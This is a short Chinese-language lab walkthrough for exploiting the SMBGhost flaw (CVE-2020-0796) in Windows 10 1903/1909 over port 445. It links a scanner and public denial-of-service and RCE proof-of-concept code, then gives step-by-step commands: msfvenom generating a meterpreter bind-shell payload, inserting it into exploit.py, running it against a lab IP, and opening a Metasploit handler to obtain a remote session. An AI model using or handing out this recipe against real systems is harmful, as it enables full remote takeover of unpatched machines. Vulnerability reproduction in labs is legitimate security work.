攻击者可能利用此漏洞远程无需用户验证,通过发送构造特殊的恶意数据导致在目标系统上执行恶意代码,受攻击的目标系统只需开机在线即可能被入侵。从而获取机器的完全控制,利用端口445
影响版本: 漏洞主要影响Windows10版本(1903和1909),包括32位、64位的家用版、专业版、企业版、教育版
检测工具:http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip 蓝屏EXP:https://github.com/eerykitty/CVE-2020-0796-PoC RCE poc:https://github.com/chompie1337/SMBGhost_RCE_PoC 参考:https://blog.csdn.net/Eastmount/article/details/105350314 windows 10纯净版:(建议迅雷下载)
ed2k://|file|cn_windows_10_business_editions_version_1903_updated_sept_2019_x64_dvd_2f5281e1.iso|5231140864|B1D5C4C401036B0B1EBA64476A95F338|/靶机版本:Windows 10 Version 1903 for x64-based Systems 靶机IP:192.168.1.4
奇安信检测工具适用于局域网批量检测,快速查找未打补丁的机器
http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.ziphttps://github.com/eerykitty/CVE-2020-0796-PoC
python CVE-2020.0796.py 192.168.1.12https://github.com/chompie1337/SMBGhost_RCE_PoC
①payload生成
msfvenom -p windows/x64/meterpreter/bind_tcp lport=1234 -f py -o smb.py②.将文件smb.py里面buf的值替换到exploit.py中 ③ 运行POC
python3 exploit.py -ip 192.168.1.12④MSF 开启监听
use exploit/multi/handlermsf5 set payload windows/x64/meterpreter/bind_tcp set lport 1234lport => 1234 set rhost 192.168.1.12 run⑤ 成功建立会话。监听端口后如果一直不弹shell,可重新运行一次 =============================================================================